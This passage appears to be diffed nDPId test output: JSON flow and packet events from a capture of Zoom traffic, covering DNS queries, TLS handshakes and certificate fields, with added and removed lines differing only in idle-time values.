{"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569520469984,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1569520469984,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6vIgAAP8Re2PAqAF1wKgBAfYMADUAJtTToX0BAAABAAAAAAAABHd3dzMEem9vbQJ1cwAAAQAB"} 
00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569520470021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1569520470021,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKWCQAADcRp7jAqAEBwKgBdQA19gwANiAtoX2BgAABAAEAAAAABHd3dzMEem9vbQJ1cwAAAQABwAwAAQABAAAAPAAENMo+7A=="} 00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": 
{"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"} 
-00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"} -00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 
-00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - 
G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} -00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569520470060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO8GVhg0yj7EwKgBdQG71lFyHvWD14gyiYASaQOGlAAAAgQFrAEBBAIBAwMM"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569520470061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBSXAqAF1NMo+xNZRAbvXiDKJch71hFAQIAAQZwAA"} +00835{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520469950,"flow_last_seen":1569520470086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470086,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1569520470134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520470134,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAAO4GVvA0yj7swKgBdQG71lK89vcv+u4WboASaQMynAAAAgQFrAEBBAIBAwMM"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1569520470134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569520470134,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGBP3AqAF1NMo+7NZSAbv67hZuvPb3MFAQIAC8bgAA"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520470022,"flow_last_seen":1569520470165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520470165,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":103,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01217{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520469950,"flow_last_seen":1569520470199,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470199,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control 
Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01222{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":116,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569520470022,"flow_last_seen":1569520470280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6125,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1569520470280,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www3.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"535aca3d99fc247509cd50933cd71d37","ja3s":"3c30f2c064a3aed8cd95de8d68c726a6","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, 
O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","alpn":"http\/1.1","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569520470350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520470350,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjK4AAAAQEICiWc3wRwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520470666,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
